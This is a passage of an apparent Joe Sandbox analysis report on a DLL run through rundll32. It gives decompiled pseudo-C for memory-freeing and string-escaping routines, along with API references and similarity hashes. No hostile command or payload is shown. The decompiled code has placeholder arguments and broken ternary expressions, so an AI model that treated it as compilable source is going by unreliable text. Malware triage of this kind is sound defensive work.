                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						E100290E0(__eax);
                                                                      						__eax =  &_a52;
                                                                      						E100290E0( &_a52);
                                                                      						__edi = _a48;
                                                                      					}
                                                                      					__eax =  *(__edi + 0x1c);
                                                                      					_a52 = __eax;
                                                                      					if(__eax == 0) {
                                                                      						L22:
                                                                      						__eax =  *(__edi + 0x20);
                                                                      						_a52 = __eax;
                                                                      						if(__eax == 0) {
                                                                      							L30:
                                                                      							E100290E0(__edi);
                                                                      							__eax =  &_a48;
                                                                      							E100290E0( &_a48);
                                                                      							goto L1;
                                                                      						}
                                                                      						__edx = __eax[0x18];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x1c];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x20];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						E100290E0(__eax);
                                                                      						__eax =  &_a52;
                                                                      						E100290E0( &_a52);
                                                                      						__edi = _a48;
                                                                      						goto L30;
                                                                      					} else {
                                                                      						__edx = __eax[0x18];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x1c];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x20];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						E100290E0(__eax);
                                                                      						__eax =  &_a52;
                                                                      						E100290E0( &_a52);
                                                                      						__edi = _a48;
                                                                      						goto L22;
                                                                      					}
                                                                      				}
                                                                      				L1:
                                                                      				 *_t120 = _t116;
                                                                      				L100290D0();
                                                                      				return _t118;
                                                                      			}







                                                                      APIs
                                                                      Strings
                                                                      • Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_freep$mv_expr_free$mv_log
                                                                      • String ID: Invalid chars '%s' at the end of expression '%s'
                                                                      • API String ID: 75827668-1422635149
                                                                      • Opcode ID: 62983a3bb7049393546072b60dbe7a8ba563001771bc1cc3aa272a22c57f5d9a
                                                                      • Instruction ID: 39916f313f6673765a40fa09fad6d79edb9ef4feb13054b409069c6d602bd34a
                                                                      • Opcode Fuzzy Hash: 62983a3bb7049393546072b60dbe7a8ba563001771bc1cc3aa272a22c57f5d9a
                                                                      • Instruction Fuzzy Hash: F3C133B95097459FC784EFA8D18591ABBF0FF88290F85586DF8C58B311D635E880CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_expr_parse.F072 ref: 10017862
                                                                        • Part of subcall function 10017110: strlen.MSVCRT ref: 10017141
                                                                        • Part of subcall function 10017110: mv_malloc.F072 ref: 1001714A
                                                                      • mv_expr_free.F072 ref: 100178D7
                                                                      • mv_expr_free.F072 ref: 100178E6
                                                                      • mv_expr_free.F072 ref: 100178F5
                                                                      • mv_freep.F072 ref: 10017904
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_freep$mv_expr_free$mv_expr_parsemv_mallocstrlen
                                                                      • String ID:
                                                                      • API String ID: 1389959791-0
                                                                      • Opcode ID: 8fc3577bfb7cae8029ba773bfad3d65c292d51f5e7331e78cc098861103f96c6
                                                                      • Instruction ID: 11b1eda091ece5b6f93ddcdca37633d3328e67849ea26751cca1a066e4925893
                                                                      • Opcode Fuzzy Hash: 8fc3577bfb7cae8029ba773bfad3d65c292d51f5e7331e78cc098861103f96c6
                                                                      • Instruction Fuzzy Hash: 75D153B9A187058FC750EF68D08591ABBF0FF89254F458D6DE9D48B312D736E881CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 18%
                                                                      			E10009730(int _a4, int _a8, unsigned int _a12, void** _a16, void* _a20) {
                                                                      				char _v29;
                                                                      				signed int _v32;
                                                                      				int _v36;
                                                                      				char _v37;
                                                                      				void** _v40;
                                                                      				signed int _v44;
                                                                      				char** _v52;
                                                                      				int _v56;
                                                                      				int __ebx;
                                                                      				int __edi;
                                                                      				signed int __esi;
                                                                      				int __ebp;
                                                                      				signed int _t114;
                                                                      				void** _t115;
                                                                      				int _t116;
                                                                      				int _t117;
                                                                      				void* _t118;
                                                                      				void* _t119;
                                                                      				int _t120;
                                                                      				void* _t121;
                                                                      				signed char _t123;
                                                                      				void* _t124;
                                                                      				signed char* _t129;
                                                                      				int _t130;
                                                                      				void* _t133;
                                                                      				unsigned int _t135;
                                                                      				int _t136;
                                                                      				signed int _t137;
                                                                      				char _t146;
                                                                      				void* _t150;
                                                                      				int _t157;
                                                                      				signed int _t158;
                                                                      				void* _t163;
                                                                      				void* _t164;
                                                                      				void* _t167;
                                                                      				void** _t170;
                                                                      				int _t172;
                                                                      				int _t173;
                                                                      				int _t174;
                                                                      				void* _t175;
                                                                      				void** _t178;
                                                                      				void*** _t179;
                                                                      				void** _t180;
                                                                      
                                                                      				_t179 =  &_v44;
                                                                      				_t170 = _a4;
                                                                      				_t129 = _a8;
                                                                      				_v44 = _a12;
                                                                      				_t112 = _a16;
                                                                      				if(_a16 == 2) {
                                                                      					L1();
                                                                      					_t114 =  *_t129 & 0x000000ff;
                                                                      					__eflags = _t114;
                                                                      					if(_t114 != 0) {
                                                                      						while(1) {
                                                                      							L56:
                                                                      							__eflags = _t114 - 0x27;
                                                                      							if(_t114 == 0x27) {
                                                                      								break;
                                                                      							}
                                                                      							_t129 =  &(_t129[1]);
                                                                      							L1();
                                                                      							_t114 =  *_t129 & 0x000000ff;
                                                                      							__eflags = _t114;
                                                                      							if(_t114 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L58;
                                                                      						}
                                                                      						 *_t179 = _t170;
                                                                      						_t129 =  &(_t129[1]);
                                                                      						_v56 = 0x100af503;
                                                                      						L100089C0();
                                                                      						_t114 =  *_t129 & 0x000000ff;
                                                                      						__eflags = _t114;
                                                                      						if(_t114 != 0) {
                                                                      							goto L56;
                                                                      						} else {
                                                                      						}
                                                                      					}
                                                                      					L58:
                                                                      					_t179 =  &(_t179[0xb]);
                                                                      					_t112 = _t170;
                                                                      					_pop(_t129);
                                                                      					_pop(_t170);
                                                                      					_pop(_t161);
                                                                      					_pop(_t177);
                                                                      					_t178 = _t112;
                                                                      					_push(_t170);
                                                                      					_push(_t129);
                                                                      					_t115 =  &(_t112[4]);
                                                                      					_t180 = _t179 - 0x2c;
                                                                      					_v29 = 0x27;
                                                                      					_t130 =  *(_t115 - 8);
                                                                      					_v40 = _t115;
                                                                      					while(1) {
                                                                      						_t116 = _a4;
                                                                      						_t144 =  <=  ? _t116 : _t130;
                                                                      						_t172 = _t130 - ( <=  ? _t116 : _t130);
                                                                      						if(_t172 > 1) {
                                                                      							break;
                                                                      						}
                                                                      						_t135 = _a12;
                                                                      						if(_t116 >= _t130 || _t135 == _t130) {
                                                                      							L22:
                                                                      							__eflags = _t172;
                                                                      							if(_t172 != 0) {
                                                                      								_t172 = 1;
                                                                      								break;
                                                                      							}
                                                                      						} else {
                                                                      							_t154 =  >  ? 1 : 0xfffffffe - _t116;
                                                                      							_t17 = _t116 + 1; // 0xffffffff
                                                                      							_t121 = ( >  ? 1 : 0xfffffffe - _t116) + _t17;
                                                                      							if(_t135 >> 1 >= _t130) {
                                                                      								_t130 = _t130 + _t130;
                                                                      								__eflags = _t130;
                                                                      							} else {
                                                                      								_t130 = _t135;
                                                                      							}
                                                                      							if(_t130 < _t121) {
                                                                      								_t125 =  <=  ? _t135 : _t121;
                                                                      								_t130 =  <=  ? _t135 : _t121;
                                                                      							}
                                                                      							_t163 =  *_t178;
                                                                      							_v56 = _t130;
                                                                      							if(_t163 == _v40) {
                                                                      								 *_t180 = 0;
                                                                      								_t123 = L10028DA0();
                                                                      								__eflags = _t123;
                                                                      								if(_t123 == 0) {
                                                                      									goto L21;
                                                                      								} else {
                                                                      									goto L15;
                                                                      								}
                                                                      							} else {
                                                                      								 *_t180 = _t163;
                                                                      								_t123 = L10028DA0();
                                                                      								if(_t123 == 0) {
                                                                      									L21:
                                                                      									_t116 = _a4;
                                                                      									goto L22;
                                                                      								} else {
                                                                      									if(_t163 == 0) {
                                                                      										L15:
                                                                      										_t157 = _a4;
                                                                      										_t164 = _t123;
                                                                      										_t175 =  *_t178;
                                                                      										_t136 = _t157 + 1;
                                                                      										_v36 = _t175;
                                                                      										__eflags = _t136 - 8;
                                                                      										if(_t136 >= 8) {
                                                                      											__eflags = _t123 & 0x00000001;
                                                                      											if((_t123 & 0x00000001) != 0) {
                                                                      												_t137 =  *_t175 & 0x000000ff;
                                                                      												_t35 = _t123 + 1; // 0x1
                                                                      												_t164 = _t35;
                                                                      												_t175 = _t175 + 1;
                                                                      												 *_t123 = _t137;
                                                                      												_t136 = _t157;
                                                                      											}
                                                                      											__eflags = _t164 & 0x00000002;
                                                                      											if((_t164 & 0x00000002) != 0) {
                                                                      												_t158 =  *_t175 & 0x0000ffff;
                                                                      												_t164 = _t164 + 2;
                                                                      												_t175 = _t175 + 2;
                                                                      												_t136 = _t136 - 2;
                                                                      												 *(_t164 - 2) = _t158;
                                                                      											}
                                                                      											__eflags = _t164 & 0x00000004;
                                                                      											if((_t164 & 0x00000004) == 0) {
                                                                      												goto L16;
                                                                      											} else {
                                                                      												_t167 = _t164 + 4;
                                                                      												 *(_t167 - 4) =  *_t175;
                                                                      												_t124 = memcpy(_t167, _t175 + 4, _t136 - 4);
                                                                      												_t180 =  &(_t180[3]);
                                                                      												goto L8;
                                                                      											}
                                                                      										} else {
                                                                      											L16:
                                                                      											_t124 = memcpy(_t164, _t175, _t136);
                                                                      											_t180 =  &(_t180[3]);
                                                                      											goto L8;
                                                                      										}
                                                                      										goto L23;
                                                                      									}
                                                                      									L8:
                                                                      									 *_t178 = _t124;
                                                                      									_a8 = _t130;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L23:
                                                                      						__eflags = 0xfffffffa;
                                                                      						_t149 =  >  ? 1 : 0xfffffffa - _t116;
                                                                      						_t150 = ( >  ? 1 : 0xfffffffa - _t116) + _t116;
                                                                      						_t117 = _a8;
                                                                      						_a4 = 0xfffffffa;
                                                                      						__eflags = _t117;
                                                                      						if(_t117 != 0) {
                                                                      							_t118 = _t117 - 1;
                                                                      							__eflags = _t118 - 0xfffffffa;
                                                                      							_t119 =  >  ? _t150 : _t118;
                                                                      							 *((char*)( *_t178 + _t119)) = 0;
                                                                      							return _t119;
                                                                      						}
                                                                      						return _t117;
                                                                      						goto L122;
                                                                      					}
                                                                      					_t173 = _t172 - 1;
                                                                      					__eflags = _t173;
                                                                      					_t174 =  >  ? 1 : _t173;
                                                                      					_t146 = _v29;
                                                                      					_t133 =  *_t178 + _t116;
                                                                      					__eflags = _t174;
                                                                      					if(_t174 != 0) {
                                                                      						_t120 = 0;
                                                                      						__eflags = 0;
                                                                      						do {
                                                                      							 *((char*)(_t133 + _t120)) = _t146;
                                                                      							_t120 = _t120 + 1;
                                                                      							__eflags = _t120 - _t174;
                                                                      						} while (_t120 < _t174);
                                                                      						_t116 = _a4;
                                                                      					}
                                                                      					goto L23;
                                                                      				} else {
                                                                      					__eflags = __eax - 3;
                                                                      					if(__eax != 3) {
                                                                      						__eax =  *__ebx;
                                                                      						__eflags = __al;
                                                                      						if(__al != 0) {
                                                                      							__eflags = __cl & 0x00000002;
                                                                      							if((__cl & 0x00000002) == 0) {
                                                                      								_v37 = 1;
                                                                      								__ebp = _v44;
                                                                      								__edi = __ebx;
                                                                      								__eflags = _v44;
                                                                      								if(_v44 == 0) {
                                                                      									_v36 = __ecx;
                                                                      									while(1) {
                                                                      										 *__esp = " \n\t\r";
                                                                      										__ebp = __al;
                                                                      										_v56 = __ebp;
                                                                      										__eax = strchr(??, ??);
                                                                      										_v56 = __ebp;
                                                                      										 *__esp = "\'\\";
                                                                      										_v44 = __eax;
                                                                      										__eax = strchr(??, ??);
                                                                      										__eflags = __eax;
                                                                      										if(__eax == 0) {
                                                                      											goto L118;
                                                                      										}
                                                                      										L113:
                                                                      										__edx = 0x5c;
                                                                      										__eax = __esi;
                                                                      										L1();
                                                                      										L114:
                                                                      										__edx =  *__edi;
                                                                      										__eax = __esi;
                                                                      										__edi = __edi + 1;
                                                                      										L1();
                                                                      										__eax =  *__edi & 0x000000ff;
                                                                      										__eflags = __al;
                                                                      										if(__al != 0) {
                                                                      											__eflags = __ebx - __edi;
                                                                      											if(__ebx == __edi) {
                                                                      												_v37 = 1;
                                                                      											} else {
                                                                      												__eflags =  *(__edi + 1);
                                                                      												_v37 =  *(__edi + 1) == 0;
                                                                      											}
                                                                      											continue;
                                                                      										}
                                                                      										goto L53;
                                                                      										L118:
                                                                      										__edx = _v44;
                                                                      										__eflags = _v44;
                                                                      										if(_v44 != 0) {
                                                                      											__eflags = _v36 & 0x00000001;
                                                                      											if((_v36 & 0x00000001) != 0) {
                                                                      												goto L113;
                                                                      											} else {
                                                                      												__eflags = _v37;
                                                                      												if(_v37 != 0) {
                                                                      													goto L113;
                                                                      												} else {
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      										goto L114;
                                                                      									}
                                                                      								} else {
                                                                      									_v32 = __ecx;
                                                                      									while(1) {
                                                                      										 *__esp = " \n\t\r";
                                                                      										__ebp = __al;
                                                                      										_v56 = __ebp;
                                                                      										__eax = strchr(??, ??);
                                                                      										_v56 = __ebp;
                                                                      										_v36 = __eax;
                                                                      										__eax = _v44;
                                                                      										 *__esp = _v44;
                                                                      										__eax = strchr(??, ??);
                                                                      										__eflags = __eax;
                                                                      										if(__eax == 0) {
                                                                      											goto L97;
                                                                      										}
                                                                      										L70:
                                                                      										__edx = 0x5c;
                                                                      										__eax = __esi;
                                                                      										L1();
                                                                      										L71:
                                                                      										__edx =  *__edi;
                                                                      										__eax = __esi;
                                                                      										__edi = __edi + 1;
                                                                      										L1();
                                                                      										__eax =  *__edi & 0x000000ff;
                                                                      										__eflags = __al;
                                                                      										if(__al != 0) {
                                                                      											__eflags = __ebx - __edi;
                                                                      											if(__ebx == __edi) {
                                                                      												_v37 = 1;
                                                                      											} else {
                                                                      												__eflags =  *(__edi + 1);
                                                                      												_v37 =  *(__edi + 1) == 0;
                                                                      											}
                                                                      											continue;
                                                                      										}
                                                                      										goto L53;
                                                                      										L97:
                                                                      										__eax = strchr("\'\\", __ebp);
                                                                      										__eflags = __eax;
                                                                      										if(__eax != 0) {
                                                                      											goto L70;
                                                                      										} else {
                                                                      											__eax = _v36;
                                                                      											__eflags = _v36;
                                                                      											if(_v36 != 0) {
                                                                      												__eflags = _v32 & 0x00000001;
                                                                      												if((_v32 & 0x00000001) != 0) {
                                                                      													goto L70;
                                                                      												} else {
                                                                      													__eflags = _v37;
                                                                      													if(_v37 != 0) {
                                                                      														goto L70;
                                                                      													} else {
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      										goto L71;
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								__edx = _v44;
                                                                      								__eflags = _v44;
                                                                      								if(_v44 == 0) {
                                                                      									while(1) {
                                                                      										__edx =  *__ebx;
                                                                      										__eax = __esi;
                                                                      										__ebx = __ebx + 1;
                                                                      										L1();
                                                                      										__eflags =  *__ebx;
                                                                      										if( *__ebx == 0) {
                                                                      											goto L53;
                                                                      										}
                                                                      										__edx =  *__ebx;
                                                                      										__eax = __esi;
                                                                      										__ebx = __ebx + 1;
                                                                      										L1();
                                                                      										__eflags =  *__ebx;
                                                                      										if( *__ebx == 0) {
                                                                      											return __eax;
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									do {
                                                                      										_v56 = __eax;
                                                                      										__eax = _v44;
                                                                      										 *__esp = _v44;
                                                                      										__eax = strchr(??, ??);
                                                                      										__eflags = __eax;
                                                                      										if(__eax != 0) {
                                                                      											__edx = 0x5c;
                                                                      											__eax = __esi;
                                                                      											L1();
                                                                      										}
                                                                      										__edx =  *__ebx;
                                                                      										__eax = __esi;
                                                                      										__ebx = __ebx + 1;
                                                                      										L1();
                                                                      										__eax =  *__ebx;
                                                                      										__eflags = __al;
                                                                      									} while (__al != 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						__eax =  *__ebx & 0x000000ff;
                                                                      						__eflags = __al;
                                                                      						if(__al != 0) {
                                                                      							__edx = __ecx;
                                                                      							__edx = __ecx & 0x00000008;
                                                                      							__eflags = __cl & 0x00000004;
                                                                      							if((__cl & 0x00000004) != 0) {
                                                                      								__eflags = __edx;
                                                                      								if(__edx == 0) {
                                                                      									goto L85;
                                                                      								} else {
                                                                      									do {
                                                                      										__dl = __al;
                                                                      										__dl = __al - 0x22;
                                                                      										__eflags = __dl - 0x1c;
                                                                      										if(__dl > 0x1c) {
                                                                      											L89:
                                                                      											__edx = __al;
                                                                      											__eax = __esi;
                                                                      											L1();
                                                                      											goto L90;
                                                                      										}
                                                                      										__edx = __dl & 0x000000ff;
                                                                      										switch( *((intOrPtr*)((__dl & 0x000000ff) * 4 +  &M100AF530))) {
                                                                      											case 0:
                                                                      												 *__esp = __esi;
                                                                      												__eax = "&quot;";
                                                                      												_v52 = "&quot;";
                                                                      												__eax = 0x100af500;
                                                                      												_v56 = 0x100af500;
                                                                      												__eax = L100089C0();
                                                                      												goto L90;
                                                                      											case 1:
                                                                      												goto L89;
                                                                      											case 2:
                                                                      												 *__esp = __esi;
                                                                      												__eax = 0x100af508;
                                                                      												_v52 = 0x100af508;
                                                                      												__eax = 0x100af500;
                                                                      												_v56 = 0x100af500;
                                                                      												__eax = L100089C0();
                                                                      												goto L90;
                                                                      											case 3:
                                                                      												 *__esp = __esi;
                                                                      												__eax = "&apos;";
                                                                      												_v52 = "&apos;";
                                                                      												__eax = 0x100af500;
                                                                      												_v56 = 0x100af500;
                                                                      												__eax = L100089C0();
                                                                      												goto L90;
                                                                      											case 4:
                                                                      												 *__esp = __esi;
                                                                      												__edi = 0x100af50e;
                                                                      												__ebp = 0x100af500;
                                                                      												_v52 = 0x100af50e;
                                                                      												_v56 = 0x100af500;
                                                                      												__eax = L100089C0();
                                                                      												goto L90;
                                                                      											case 5:
                                                                      												 *__esp = __esi;
                                                                      												__edx = 0x100af513;
                                                                      												__ecx = 0x100af500;
                                                                      												_v52 = 0x100af513;
                                                                      												_v56 = 0x100af500;
                                                                      												__eax = L100089C0();
                                                                      												goto L90;
                                                                      										}
                                                                      										L90:
                                                                      										__eax =  *(__ebx + 1) & 0x000000ff;
                                                                      										__ebx = __ebx + 1;
                                                                      										__eflags = __al;
                                                                      									} while (__al != 0);
                                                                      									return __eax;
                                                                      								}
                                                                      								do {
                                                                      									goto L85;
                                                                      									L84:
                                                                      									__eax =  *(__ebx + 1) & 0x000000ff;
                                                                      									__ebx = __ebx + 1;
                                                                      									__eflags = __al;
                                                                      								} while (__al != 0);
                                                                      								goto L53;
                                                                      								L85:
                                                                      								__eflags = __al - 0x3c;
                                                                      								if(__eflags == 0) {
                                                                      									 *__esp = __esi;
                                                                      									__eax = 0x100af50e;
                                                                      									__edx = 0x100af500;
                                                                      									_v52 = 0x100af50e;
                                                                      									_v56 = 0x100af500;
                                                                      									__eax = L100089C0();
                                                                      								} else {
                                                                      									if(__eflags <= 0) {
                                                                      										__eflags = __al - 0x26;
                                                                      										if(__al == 0x26) {
                                                                      											 *__esp = __esi;
                                                                      											__eax = 0x100af508;
                                                                      											_v52 = 0x100af508;
                                                                      											__eax = 0x100af500;
                                                                      											_v56 = 0x100af500;
                                                                      											__eax = L100089C0();
                                                                      										} else {
                                                                      											__eflags = __al - 0x27;
                                                                      											if(__al != 0x27) {
                                                                      												goto L103;
                                                                      											} else {
                                                                      												 *__esp = __esi;
                                                                      												__ebp = "&apos;";
                                                                      												__eax = 0x100af500;
                                                                      												_v52 = "&apos;";
                                                                      												_v56 = 0x100af500;
                                                                      												__eax = L100089C0();
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										__eflags = __al - 0x3e;
                                                                      										if(__al != 0x3e) {
                                                                      											L103:
                                                                      											__edx = __al;
                                                                      											__eax = __esi;
                                                                      											L1();
                                                                      										} else {
                                                                      											 *__esp = __esi;
                                                                      											__ecx = 0x100af513;
                                                                      											__edi = 0x100af500;
                                                                      											_v52 = 0x100af513;
                                                                      											_v56 = 0x100af500;
                                                                      											__eax = L100089C0();
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								goto L84;
                                                                      							} else {
                                                                      								__eflags = __edx;
                                                                      								if(__edx == 0) {
                                                                      									do {
                                                                      										__eflags = __al - 0x3c;
                                                                      										if(__al == 0x3c) {
                                                                      											 *__esp = __esi;
                                                                      											__ebp = 0x100af50e;
                                                                      											__eax = 0x100af500;
                                                                      											_v52 = 0x100af50e;
                                                                      											_v56 = 0x100af500;
                                                                      											__eax = L100089C0();
                                                                      										} else {
                                                                      											__eflags = __al - 0x3e;
                                                                      											if(__al != 0x3e) {
                                                                      												__eflags = __al - 0x26;
                                                                      												if(__al == 0x26) {
                                                                      													 *__esp = __esi;
                                                                      													__eax = 0x100af508;
                                                                      													_v52 = 0x100af508;
                                                                      													__eax = 0x100af500;
                                                                      													_v56 = 0x100af500;
                                                                      													__eax = L100089C0();
                                                                      												} else {
                                                                      													__edx = __al;
                                                                      													__eax = __esi;
                                                                      													L1();
                                                                      												}
                                                                      											} else {
                                                                      												 *__esp = __esi;
                                                                      												__ecx = 0x100af513;
                                                                      												__edi = 0x100af500;
                                                                      												_v52 = 0x100af513;
                                                                      												_v56 = 0x100af500;
                                                                      												__eax = L100089C0();
                                                                      											}
                                                                      										}
                                                                      										__eax =  *(__ebx + 1) & 0x000000ff;
                                                                      										__ebx = __ebx + 1;
                                                                      										__eflags = __al;
                                                                      									} while (__al != 0);
                                                                      								} else {
                                                                      									do {
                                                                      										__eflags = __al - 0x3c;
                                                                      										if(__eflags == 0) {
                                                                      											 *__esp = __esi;
                                                                      											__edx = 0x100af50e;
                                                                      											__ecx = 0x100af500;
                                                                      											_v52 = 0x100af50e;
                                                                      											_v56 = 0x100af500;
                                                                      											__eax = L100089C0();
                                                                      										} else {
                                                                      											if(__eflags <= 0) {
                                                                      												__eflags = __al - 0x22;
                                                                      												if(__al == 0x22) {
                                                                      													 *__esp = __esi;
                                                                      													__eax = "&quot;";
                                                                      													_v52 = "&quot;";
                                                                      													__eax = 0x100af500;
                                                                      													_v56 = 0x100af500;
                                                                      													__eax = L100089C0();
                                                                      												} else {
                                                                      													__eflags = __al - 0x26;
                                                                      													if(__al != 0x26) {
                                                                      														goto L102;
                                                                      													} else {
                                                                      														 *__esp = __esi;
                                                                      														__eax = 0x100af508;
                                                                      														_v52 = 0x100af508;
                                                                      														__eax = 0x100af500;
                                                                      														_v56 = 0x100af500;
                                                                      														__eax = L100089C0();
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												__eflags = __al - 0x3e;
                                                                      												if(__al != 0x3e) {
                                                                      													L102:
                                                                      													__edx = __al;
                                                                      													__eax = __esi;
                                                                      													L1();
                                                                      												} else {
                                                                      													 *__esp = __esi;
                                                                      													__edi = 0x100af513;
                                                                      													__ebp = 0x100af500;
                                                                      													_v52 = 0x100af513;
                                                                      													_v56 = 0x100af500;
                                                                      													__eax = L100089C0();
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      										goto L41;
                                                                      										L41:
                                                                      										__eax =  *(__ebx + 1) & 0x000000ff;
                                                                      										__ebx = __ebx + 1;
                                                                      										__eflags = __al;
                                                                      									} while (__al != 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L53:
                                                                      					return __eax;
                                                                      				}
                                                                      				L122:
                                                                      			}














































                                                                      0x10009b6f
                                                                      0x10009b6f
                                                                      0x10009b74
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10009b7a
                                                                      0x10009b74
                                                                      0x10009b69
                                                                      0x10009b5e
                                                                      0x00000000
                                                                      0x10009b52
                                                                      0x10009950
                                                                      0x10009818
                                                                      0x10009818
                                                                      0x1000981c
                                                                      0x1000981e
                                                                      0x100099b8
                                                                      0x100099b8
                                                                      0x100099bb
                                                                      0x100099bd
                                                                      0x100099be
                                                                      0x100099c3
                                                                      0x100099c6
